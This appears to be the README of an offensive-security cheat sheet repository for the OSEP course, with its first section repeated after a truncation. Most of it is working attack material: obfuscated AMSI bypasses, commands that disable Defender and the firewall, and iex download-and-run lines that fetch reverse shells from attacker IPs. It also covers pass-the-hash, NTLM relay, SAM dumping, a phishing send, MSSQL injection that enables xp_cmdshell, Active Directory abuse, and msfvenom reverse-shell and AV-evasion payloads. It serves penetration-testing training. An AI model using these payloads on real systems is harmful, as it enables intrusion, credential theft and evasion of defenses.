OSEPlayground 🛝
[!NOTE]
Some of the tools and scripts in here weren’t made by me - huge thanks to everyone whose code contributed to this repository!
Payloads consisting shellcode will not work with the XOR encryption of msfvenom. Instead, encrypt the shellcode by using the one provided here or the GUI version available here.
Tunneling - Ligolo-NG
We will use the powershell shellcode runner here.
-
Make sure to convert agent.exe of ligolo to shellcode:
- donut -f 1 -o agent.bin -a 2 -p "-connect your-server:11601 -ignore-cert" -i agent.exe
-
Make sure you are running as x64 bit process before running:
- Powershell - [Environment]::Is64BitProcess
- CMD - set p (Should show PROCESSOR_ARCHITECTURE=AMD64)
If you are in 32bit process, run: %windir%\sysnative\WindowsPowerShell\v1.0\powershell.exe - then check again.
- Make sure to change line number 14 to point to your IP Address:
$url = "http://192.168.45.168/agent.bin" # CHANGE ME
- Invoke it:
iex(iwr http://192.168.45.173:443/ligolo.ps1 -UseBasicParsing)
Finally you should see an agent connected to your ligolo server.
Map The Network
Automation for /etc/hosts file:
netexec smb 172.16.149.0/24 --log hosts.txt && sed -i 's/x64//g' hosts.txt && cat hosts.txt | awk '{print $9,$11,$11"."$21}' | sed 's/(domain://g' | sed 's/)//g' | uniq | sort -u | tr '[:upper:]' '[:lower:]' | sudo tee -a /etc/hosts
Windows Privilege Escalation
- PrivescCheck:
Invoke-PrivescCheck -Report PrivescCheck_$($env:COMPUTERNAME) -Format HTML
- winPEAS:
iex(iwr http://192.168.45.196/winPEAS.ps1 -useb)
AMSI-Bypass
class TrollAMSI{static [int] M([string]$c, [string]$s){return 1}}[System.Runtime.InteropServices.Marshal]::Copy(@([System.Runtime.InteropServices.Marshal]::ReadIntPtr([long]([TrollAMSI].GetMethods() | Where-Object Name -eq 'M').MethodHandle.Value + [long]8)),0, [long]([Ref].Assembly.GetType('System.Ma'+'nag'+'eme'+'nt.Autom'+'ation.A'+'ms'+'iU'+'ti'+'ls').GetMethods('N'+'onPu'+'blic,st'+'at'+'ic') | Where-Object Name -eq ScanContent).MethodHandle.Value + [long]8,1)
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
(([Ref].Assembly.gettypes() | ? {$_.Name -like "Amsi*utils"}).GetFields("NonPublic,Static") | ? {$_.Name -like "amsiInit*ailed"}).SetValue($null,$true)
Windows Defender and Firewall Commands
| Description |
Command |
| Disable firewall - New way |
netsh advfirewall set allprofiles state off |
| Disable Firewall - Old way |
netsh firewall set opmode disable |
| Disable firewall service (can only run as SYSTEM?) |
net stop mpssvc |
| Current firewall profile |
netsh advfirewall show currentprofile |
| Firewall rules |
netsh advfirewall firewall show rule name=all |
| Show open ports |
netstat -ano |
| Network Information |
ipconfig /all |
| EXE Exclusion |
Add-MpPreference -ExclusionExtension “.exe” |
| Turn off Virus & Threat Detection |
Set-MpPreference -DisableRealtimeMonitoring $true |
| Remove all definitions |
cmd.exe /c “C:\Program Files\Windows Defender\MpCmdRun.exe” -removedefinitions -all |
Useful Basic Commands
Run command as another user:
-
Invoke-RunasCs amit 'Password123!' 'powershell iex(iwr http://192.168.45.185/rev.txt -usebasicparsing)' -ForceProfile -CreateProcessFunction 2 -BypassUac
-
runas.exe /netonly /user:final.com\nina cmd.exe
Set up SMB server (file transfer):
-
smbserver.py share $(pwd) -smb2support -username amit -password password
-
On Victim: net use \\192.168.45.223\share /U:amit password
-
Copy files: copy <FILENAME> \\192.168.45.223\share
Locate local/proof files
Send email with attachment (Phishing)
swaks --to [email protected] --from [email protected] --header "Subject: My CV" --body "Attached my CV to this mail, thank you!" --attach @rev.doc --server 192.168.157.201
Enumeration
Search for SSH keys in Users directory:
- Get-ChildItem -Path C:\Users -Include .ssh -Directory -Recurse -ErrorAction SilentlyContinue | ForEach-Object { Get-ChildItem -Path $_.FullName -File -Recurse -ErrorAction SilentlyContinue }
Search for interesting files:
- Get-ChildItem -Path C:\Users -Include *.xml,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,id_rsa,authorized_keys,*.exe,*.log -File -Recurse -ErrorAction SilentlyContinue
Powershell History Path:
- C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Sticky Notes Path:
- C:\Users\*\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\
Enable RDP and RestrictedAdmin
Note: Enabling RestrictedAdmin allow us to perform PassTheHash with RDP.
Using command prompt (Local):
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f && reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 && netsh firewall set service remoteadmin enable && netsh firewall set service remotedesktop enable
Using netexec (Remote):
netexec smb db01 -u administrator -H faf3185b0a608ce2f8afb6f8d133f85b --local-auth -X 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f;reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0;netsh firewall set service remoteadmin enable;netsh firewall set service remotedesktop enable' --exec-method atexec
RDP to host:
Password Auth:
- xfreerdp /v:172.16.231.221 /u:amit /p:'Password123!' /cert-ignore /compression +dynamic-resolution +clipboard
NTLM Auth:
- xfreerdp /v:172.16.231.221 /u:amit /pth:'<NTLM HASH>' /cert-ignore /compression +dynamic-resolution +clipboard
atexec.py
atexec.py test.local/john:[email protected] whoami' atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 test.local/[email protected] whoami
Escalate to SYSTEM via Schedule Task
Dump SAM (Make sure session is running with SYSTEM privileges)
- Background the meterpreter session with
bg.
use post/windows/gather/hashdump set SESSION <Session Number> run
TCP Port Redirection via powercat
Mostly be used for NTLM Relay attacks when the authentication cannot reach our attacking machine, so the idea is to redirect it from a random host in the network (where we have ad
... Content truncated. Click "See More" to view the full README.
OSEPlayground 🛝
[!NOTE]
Some of the tools and scripts in here weren’t made by me - huge thanks to everyone whose code contributed to this repository!
Payloads consisting shellcode will not work with the XOR encryption of msfvenom. Instead, encrypt the shellcode by using the one provided here or the GUI version available here.
Tunneling - Ligolo-NG
We will use the powershell shellcode runner here.
-
Make sure to convert agent.exe of ligolo to shellcode:
- donut -f 1 -o agent.bin -a 2 -p "-connect your-server:11601 -ignore-cert" -i agent.exe
-
Make sure you are running as x64 bit process before running:
- Powershell - [Environment]::Is64BitProcess
- CMD - set p (Should show PROCESSOR_ARCHITECTURE=AMD64)
If you are in 32bit process, run: %windir%\sysnative\WindowsPowerShell\v1.0\powershell.exe - then check again.
- Make sure to change line number 14 to point to your IP Address:
$url = "http://192.168.45.168/agent.bin" # CHANGE ME
- Invoke it:
iex(iwr http://192.168.45.173:443/ligolo.ps1 -UseBasicParsing)
Finally you should see an agent connected to your ligolo server.
Map The Network
Automation for /etc/hosts file:
netexec smb 172.16.149.0/24 --log hosts.txt && sed -i 's/x64//g' hosts.txt && cat hosts.txt | awk '{print $9,$11,$11"."$21}' | sed 's/(domain://g' | sed 's/)//g' | uniq | sort -u | tr '[:upper:]' '[:lower:]' | sudo tee -a /etc/hosts
Windows Privilege Escalation
- PrivescCheck:
Invoke-PrivescCheck -Report PrivescCheck_$($env:COMPUTERNAME) -Format HTML
- winPEAS:
iex(iwr http://192.168.45.196/winPEAS.ps1 -useb)
AMSI-Bypass
class TrollAMSI{static [int] M([string]$c, [string]$s){return 1}}[System.Runtime.InteropServices.Marshal]::Copy(@([System.Runtime.InteropServices.Marshal]::ReadIntPtr([long]([TrollAMSI].GetMethods() | Where-Object Name -eq 'M').MethodHandle.Value + [long]8)),0, [long]([Ref].Assembly.GetType('System.Ma'+'nag'+'eme'+'nt.Autom'+'ation.A'+'ms'+'iU'+'ti'+'ls').GetMethods('N'+'onPu'+'blic,st'+'at'+'ic') | Where-Object Name -eq ScanContent).MethodHandle.Value + [long]8,1)
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
(([Ref].Assembly.gettypes() | ? {$_.Name -like "Amsi*utils"}).GetFields("NonPublic,Static") | ? {$_.Name -like "amsiInit*ailed"}).SetValue($null,$true)
Windows Defender and Firewall Commands
| Description |
Command |
| Disable firewall - New way |
netsh advfirewall set allprofiles state off |
| Disable Firewall - Old way |
netsh firewall set opmode disable |
| Disable firewall service (can only run as SYSTEM?) |
net stop mpssvc |
| Current firewall profile |
netsh advfirewall show currentprofile |
| Firewall rules |
netsh advfirewall firewall show rule name=all |
| Show open ports |
netstat -ano |
| Network Information |
ipconfig /all |
| EXE Exclusion |
Add-MpPreference -ExclusionExtension “.exe” |
| Turn off Virus & Threat Detection |
Set-MpPreference -DisableRealtimeMonitoring $true |
| Remove all definitions |
cmd.exe /c “C:\Program Files\Windows Defender\MpCmdRun.exe” -removedefinitions -all |
Useful Basic Commands
Run command as another user:
-
Invoke-RunasCs amit 'Password123!' 'powershell iex(iwr http://192.168.45.185/rev.txt -usebasicparsing)' -ForceProfile -CreateProcessFunction 2 -BypassUac
-
runas.exe /netonly /user:final.com\nina cmd.exe
Set up SMB server (file transfer):
-
smbserver.py share $(pwd) -smb2support -username amit -password password
-
On Victim: net use \\192.168.45.223\share /U:amit password
-
Copy files: copy <FILENAME> \\192.168.45.223\share
Locate local/proof files
Send email with attachment (Phishing)
swaks --to [email protected] --from [email protected] --header "Subject: My CV" --body "Attached my CV to this mail, thank you!" --attach @rev.doc --server 192.168.157.201
Enumeration
Search for SSH keys in Users directory:
- Get-ChildItem -Path C:\Users -Include .ssh -Directory -Recurse -ErrorAction SilentlyContinue | ForEach-Object { Get-ChildItem -Path $_.FullName -File -Recurse -ErrorAction SilentlyContinue }
Search for interesting files:
- Get-ChildItem -Path C:\Users -Include *.xml,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,id_rsa,authorized_keys,*.exe,*.log -File -Recurse -ErrorAction SilentlyContinue
Powershell History Path:
- C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Sticky Notes Path:
- C:\Users\*\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\
Enable RDP and RestrictedAdmin
Note: Enabling RestrictedAdmin allow us to perform PassTheHash with RDP.
Using command prompt (Local):
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f && reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 && netsh firewall set service remoteadmin enable && netsh firewall set service remotedesktop enable
Using netexec (Remote):
netexec smb db01 -u administrator -H faf3185b0a608ce2f8afb6f8d133f85b --local-auth -X 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f;reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0;netsh firewall set service remoteadmin enable;netsh firewall set service remotedesktop enable' --exec-method atexec
RDP to host:
Password Auth:
- xfreerdp /v:172.16.231.221 /u:amit /p:'Password123!' /cert-ignore /compression +dynamic-resolution +clipboard
NTLM Auth:
- xfreerdp /v:172.16.231.221 /u:amit /pth:'<NTLM HASH>' /cert-ignore /compression +dynamic-resolution +clipboard
atexec.py
atexec.py test.local/john:[email protected] whoami' atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 test.local/[email protected] whoami
Escalate to SYSTEM via Schedule Task
Dump SAM (Make sure session is running with SYSTEM privileges)
- Background the meterpreter session with
bg.
use post/windows/gather/hashdump set SESSION <Session Number> run
TCP Port Redirection via powercat
Mostly be used for NTLM Relay attacks when the authentication cannot reach our attacking machine, so the idea is to redirect it from a random host in the network (where we have admin privileges) to our attacking machine.
first step is to allow inbound and outbound connections to our victim machine on port 445:
Using CMD:
netsh advfirewall firewall add rule name="Allow Port 445 Inbound" dir=in action=allow protocol=TCP localport=445
netsh advfirewall firewall add rule name="Allow Port 445 Outbound" dir=out action=allow protocol=TCP remoteport=445
Using Powershell:
New-NetFirewallRule -DisplayName "Allow Port 445 Inbound" -Direction Inbound -Protocol TCP -LocalPort 445 -Action Allow
New-NetFirewallRule -DisplayName "Allow Port 445 Outbound" -Direction Outbound -Protocol TCP -RemotePort 445 -Action Allow
Now, we will need to disable the SMB port on the victim:
Note: Run one by one in CMD, no powershell!)
sc config LanmanServer start= disabled
sc stop LanmanServer
sc stop srv2
sc stop srvnet
Next, we will invoke powercat.ps1: iex(iwr http://192.168.45.223/powercat.ps1 -useb) and run:
- powercat -l -p 445 -r tcp:<PARROT IP>:445 -rep
Once it’s running we can check if the victim is listening on port 445: netstat -anto | findstr 445
Last step is to perform the Relay - !REMEMEBER! not to our attacking box, but to the victim machine! and see the callback to our machine on port 445 tunneled from the victim!
MSSQL Useful Queries
Note: privileges in a database might differ, check every access you can accomplish, which mean using the local administrator, machine account, etc.
Injection POC - time delay:
- test'; WAITFOR DELAY '0:0:5'-- -
In case of Injection, we can try enable xp_cmdshell and get code execution (might need to URL encode the payload, even as POST data):
- test'; EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;-- -
List databases:
- select * from sys.databases;
List tables inside specific database:
- select * from <DATABASE NAME>..sysobjects WHERE xtype = 'U';
List columns inside specific table :
- select * from wordpress..wp_users;
Update specific column:
- update wordpress..wp_users set user_pass = '$P$BAyzjPk37CdiX/e/XxwB9I7wZgBG8Q/' WHERE user_login = 'admin';
Impersonate SA on linked server and execute commands:
-- Switch to sa only if needed
EXECUTE AS LOGIN = 'sa';
EXEC('sp_configure ''show advanced options'',1; RECONFIGURE') AT SQL03;
exec ('EXEC sp_configure ''xp_cmdshell'',1 RECONFIGURE') at SQL03
EXEC('xp_cmdshell ''powershell whoami''') AT SQL03;
MSSQLPwner
Enumerate MSSQL instance:
- mssqlpwner -hashes ':d38a856d6126f47a58ebfa34a4b70fef' 'WEB01$'@db01 -windows-auth enumerate
Get interactive prompt:
- mssqlpwner -hashes ':d38a856d6126f47a58ebfa34a4b70fef' 'WEB01$'@db01 -windows-auth interactive
Execute direct query:
- mssqlpwner corp.com/user:[email protected] -windows-auth direct-query "SELECT CURRENT_USER"
Execute xp_cmdshell (automation is done by the tool, it will try every variation to get it done):
- exec -command_execution_method (xp_cmdshell/sp_oacreate) "powershell iex(iwr http://192.168.45.196/hollow.ps1 -useb)"
Execute command through custom assembly:
- mssqlpwner corp.com/user:[email protected] -windows-auth custom-asm hostname
Retrieving password from the linked server:
- mssqlpwner corp.com/user:[email protected] -windows-auth -link-server DC01 retrieve-password
PowerUPSQL
| Purpose |
Command |
| Get MSSQL Instances in the current domain |
Get-SQLInstanceDomain |
| Test for access on the instances |
Get-SQLInstanceDomain \ |
| Get INFO about the accessible instances |
Get-SQLInstanceDomain \ |
| Search Database Links |
Get-SQLServerLink -Instance dcorp-mssql -Verbose |
| Get nested links using PowerUpSQL |
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose |
| Query nested links using OpenQuery |
select * from openquery(“dcorp-sql1”,’select * from openquery(“dcorp-mgmt”,’‘select * from master..sysservers’‘)’) |
| Enable xp_cmdshell on remote link |
EXECUTE(‘sp_configure “xp_cmdshell”,1;reconfigure;’) AT “eu-sql” |
| Execute commands using PowerUpSQL |
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query “exec master..xp_cmdshell ‘whoami’” \ |
| Execute command manually (GUI) |
select * from openquery(“dcorp-sql1”,’select * from openquery(“dcorp-mgmt”,’‘select * from openquery(“eu-sql.eu.eurocorp.local”,’‘’‘select @@version as version;exec master..xp_cmdshell “powershell whoami)’‘’‘)’‘)’) |
| Reverse Shell |
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query “exec master..xp_cmdshell ‘powershell iex(New-Object Net.WebClient).DownloadString(‘’http://172.16.100.26/Invoke-PowershellTcp.ps1’‘)’” \ |
| Audit for issues |
Invoke-SQLAudit -Verbose |
| Escalate to sysadmin |
Invoke-SQLEscalatePriv -Verbose -Instance SQLServer1 |
| Execute xp_dirtree |
sqlcmd -Q “xp_dirtree ‘\\10.10.14.51\test’“ |
NTLM Relay:
Notes: three tools involved: Responder,ntlmrelayx and mssqlpwner/impacket, also, make sure the user authenticating to us have local admin access to the desired target
Prepare BASE64 command to execute:
$text = "(New-Object System.Net.WebClient).DownloadString('http://192.168.45.229/rev.txt') | IEX"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($text)
$EncodedText = [Convert]::ToBase64String($bytes)
$EncodedText
Set up NTLM Relay:
Command Execution:
ntlmrelayx.py --no-http-server -smb2support -t 192.168.156.6 -c 'command/base64 blob here'
SAM Dump:
ntlmrelayx.py --no-http-server -smb2support -t smb://172.16.192.152
Fire up Responder
sudo responder -I tun0 -A (make sure SMB is turned OFF in /etc/responder/Responder.conf)
Trigger SMB authentication:
MSSQLPwner:
mssqlpwner user:pass@<MSSQL INSTANCE IP> -windows-auth ntlm-relay -relay-method (xp_dirtree/xp_subdirs/xp_fileexist) <OUR ATTACKING MACHINE IP>
impacket:
xp_dirtree \\192.168.45.196\blabla |
Domain Enumeration
Domain/DC Information
Get-NetDomain - Query basic domain info Get-NetDomain -Domain megacorp.com - Query basic info of trusted domain. Get-NetDomainController - Information of the DC, IP Included. Get-NetDomainController -Domain megacorp.com - Information about another DC, IP Included. Get-DomainSID - Query the domain SID. Get-NetGroupMember -GroupName "Enterprise Admins" -Domain moneycorp.local - Query specific group information including their SID. Get-DomainPolicy - Query domain policy information.
Domain Users/Groups Enumeration
Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount - Basic user enabled info Get-NetUser | select cn - Get the whole domain users. Get-NetUser | select cn,description - All user’s description. Get-DomainUser -PreauthNotRequired -verbose | select samaccountname - ASREPRoastable users. (GetNPUsers) Get-NetUser -SPN - Kerberoastable users Get-DomainSPNTicket -SPN "MSSQLSvc/sqlserver.targetdomain.com" - Query SPN hashes (for offline cracking mostly). Get-UserProperty -Properties description - Descriptions of all domain users. Find-UserField -SearchField Description -SearchTerm "password" - Search for the password string in the user’s description. Get-NetGroup -GroupName *admin* - Show all groups has the admin word in it. Get-NetGroupMember -Identity "Domain Admins" -Recurse - Get all domain admins in the domain.
Domain Computers Enumeration
Get-NetComputer - Query all domain joined computers in the current domain. Get-NetComputer -FullData - Query all the machines in the domain with full properties. Get-NetComputer -FullData | select name - Query NetBIOS computer names (not FQDN). Get-NetComputer -OperatingSystem "*Server 2016*" - Query specific operating system computers. Get-NetComputer -Ping - Check alive hosts.
Sessions
Get-NetSession -ComputerName sv-dc01 - Query active sessions on the remote computer. Get-NetLoggedOn -ComputerName svclient08 - Query logged on users from a target computer. Get-LoggedonLocal -ComputerName megacorp.com - Query locally logged users on a computer.
Enumerate GPO applied in specific OU
Get-NetGPO -GPOname "{AB..81}" - Query GPO applied on an OU. Get-DomainOU -OUName StudentMachines | %{Get-NetComputer -ADSpath $_} - Query computers in specific OU. Get-DomainGPO | select displayname - Show all domain GPO’s name.
Enumerate Trusts
Get-NetForestDomain -Verbose - All domains in the current forest. Get-NetDomainTrust - Map the trusts of the current domain. Get-NetForestDomain -Forest eurocorp.local -Verbose | Get-NetDomainTrust - Enumerate trusts for a trusting domain. Get-NetGPOGroup - Get GPO’s which use Restricted Groups or groups.xml for interesting users.
TGS Abuse
| Service Type |
Service Silver Tickets |
| WMI |
Host, RPCSS |
| PowerShell Remoting |
HOST,HTTP |
| WinRM |
HOST,HTTP,WINRM |
| Scheduled Tasks |
HOST |
| Windows File Share/PSEXEC |
CIFS |
| Golden Tickets |
krbtgt |
| LDAP operations, included DCSync |
LDAP |
BloodyAD Cheetsheet
| Purpose |
Command |
| Retrieve User Information |
bloodyAD –host $dc -d $domain -u $username -p $password get object $target_username |
| Add User To Group |
bloodyAD –host $dc -d $domain -u $username -p $password add groupMember $group_name $member_to_add |
| Change Password |
bloodyAD –host $dc -d $domain -u $username -p $password set password $target_username $new_password |
| Give User GenericAll Rights |
bloodyAD –host $dc -d $domain -u $username -p $password add genericAll $DN $target_username |
| WriteOwner |
bloodyAD –host $dc -d $domain -u $username -p $password set owner $target_group $target_username |
| Read GMSA Password |
bloodyAD –host $dc -d $domain -u $username -p $password get object $target_username –attr msDS-ManagedPassword |
| Enable a Disabled Account |
bloodyAD –host $dc -d $domain -u $username -p $password remove uac $target_username -f ACCOUNTDISABLE |
| Add The TRUSTED_TO_AUTH_FOR_DELEGATION Flag |
bloodyAD –host $dc -d $domain -u $username -p $password add uac $target_username -f TRUSTED_TO_AUTH_FOR_DELEGATION |
| Read LAPS Password |
bloodyAD –host “$DC_IP” -d “$DOMAIN” -u “$USER” -p “$PASSWORD” get search –filter ‘(ms-mcs-admpwdexpirationtime=*)’ –attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime |
| Read LAPS Password (Kerberos Auth) |
KRB5CCNAME=ted.ccache bloodyAD -k –dc-ip “192.168.202.120” –host dc03.infinity.com -d “infinity.com” get search –filter ‘(ms-mcs-admpwdexpirationtime=*)’ –attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime |
MSFVenom Payload Generation Cheetsheet
| Name |
Payload |
| msfvenom DLL 64bit |
msfvenom -p windows/x64/shell_reverse_tcp -ax64 -f dll LHOST=192.168.137.130 LPORT=9500 > reverse_64bit.dll |
| msfvenom DLL 32bit |
msfvenom -p windows/reverse_tcp -ax86 -f dll LHOST=192.168.137.130 LPORT=9500 > reverse_32bit.dll |
| BASH Reverse shell |
msfvenom -p cmd/unix/reverse_bash LHOST=IP LPORT=PORT -f raw > shell.sh |
| JSP shell |
msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f raw > shell.jsp |
| Linux Reverse Shell |
msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elf |
| Windows add user |
msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe |
| HTA Reverse Shell |
sudo msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f hta-psh -o evil.hta |
| Staged Payload for Windows x86 |
msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe -o shell-x86.exe |
| Staged Payloads for Windows x64 |
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f exe -o shell-x64.exe |
| CMDEXEC |
msfvenom -p windows/exec CMD=”Your Command Here” -f exe -o shell.exe |
| bind shell - x64 |
msfvenom -p windows/x64/shell_bind_tcp LPORT=50001 RHOST=10.11.1.75 –platform windows -a x64 –format raw -o sc_x64_payload.bin |
| Linux - x86 reverse shell |
msfvenom -p linux/x86/shell/reverse_tcp LHOST= LPORT= -f elf > shell-x86.elf |
| Linux - x64 reverse shell |
msfvenom -p linux/x64/shell/reverse_tcp LHOST= LPORT= -f elf > shell-x64.elf |
| Putty.exe WinDef Bypass |
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.175 LPORT=8443 EXITFUNC=thread PREPENDMIGRATE=true PREPENDMIGRATEPROC=explorer.exe -f exe -o /mnt/Projects/test4.exe -e x64/xor_dynamic -i 10 -x ./putty.exe -k |
| 64bit Staged Shellcode |
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.100.102.188 LPORT=9001 -f c |
| 64bit NonStaged Shellcode |
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.100.102.188 LPORT=9001 -f c` |
